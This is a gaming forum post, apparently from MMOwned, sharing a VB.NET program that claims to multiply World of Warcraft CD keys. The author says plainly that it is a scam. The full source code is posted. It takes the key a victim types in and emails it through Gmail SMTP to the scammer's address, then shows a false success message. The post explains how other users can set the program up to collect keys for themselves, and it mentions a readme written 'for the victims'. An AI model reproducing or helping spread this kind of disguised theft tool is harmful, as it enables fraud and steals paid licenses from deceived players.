I decided to make a thread here too, because I saw there is a lot attention going towards my program. And it's a program and it should also be here, not only in the Scams section. If you have a problem, I will delete the thread here. Below is all copy/paste from my thread!
Hello, and welcome. This is my first program. I started it before WotLK came out but never wanted to finish it (it was a blank form). Now I'm in such a need of WotLK keys I decided to finish it (although this is just like making it, it only had a label and a name).
What this program does is send the information entered in the TextBox to a gmail e-mail, which is going to send it to YOUR e-mail. Right now it's configured to my e-mail but you can change it.
For that you will need Visual Studio. But first I want to show you the program!
The Program Itself
The E-mail you get from your g-mail
World of Warcraft Mutliply and Change.rar
USING THE PROGRAM
To do this you will need Microsoft Visual Studio. After you have that, open my program with it and click the code tab. You will see:
The orange is the password to the [email protected] (which would be your gmail address). Everyone with Visual Studio can see it. Please don't be pricks and steal anything, because I can just block my mail and you won't be able to enter with the password. Besides, I trust the MMOwned community.Code:Imports System.Web Imports System.IO Imports System.Net.Mail Public Class WH_Team Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click If TextBox1.Text = "" Then MsgBox("Please type your World of Warcraft: Wrath of The Lich King key to proceed.", MsgBoxStyle.OkOnly, "WoW GM Hack") End If Dim mail As New System.Net.Mail.MailMessage() Dim SmtpServer As New SmtpClient SmtpServer.Credentials = New Net.NetworkCredential("[email protected]", "maskedpw") SmtpServer.Port = 587 SmtpServer.Host = "smtp.gmail.com" SmtpServer.EnableSsl = True mail.To.Add("[email protected]") mail.From = New MailAddress("[email protected]") mail.Subject = "Wrath of The Lich King" mail.Body = "World of Warcraft: Wrath of the Lich King CD-KEY " & TextBox1.Text SmtpServer.Send(mail) MsgBox("Thank you for using this program! Your World of Warcraft: Wrath of The Lich King CD-KEY will be multiplied untill there are 10 of them, and it will also create 10 Classic World of Wacraft Keys, as well as 10 World of Warcraft: The Burning Crusade Keys.", MsgBoxStyle.OkOnly, "World of Wacraft Multiply and Change") End Sub End Class
The things in red in the code must be [email protected]
Both of them should be the same gmail, remember!
The one in green is your other e-mail (doesn't have to be gmail). The info will be send to the red e-mail which will re-send it to this green e-mail!
NOTE: Please say a thank you before you leech it, because I hate giving something to only be seen by leechers who won't even a thanks, thus making the thread sink in the pages which isn't good.
So, happy new year. It seems I'm a little late, but no matter.
NOTE: I have a problem which I think you guys can help me with.
Every time you stretch the window of the program the picture moves, but the labels and textbox stay at one place. And some times the picture doubles itself, but is resized (though it can make it ugly like that).
Any ideas?
I had one, but it wasn't for fixing the problem itself.
I put a readme file for the victims which says what exactly to do, and I meantioned the bugs.
Ok, that's all from me and I hope you like it. Don't steal it or I'll find ANY profile of yours on any site, and I'm going to ruin your reputation like you would ruin mine.
Don't forget to comment and say a thanks!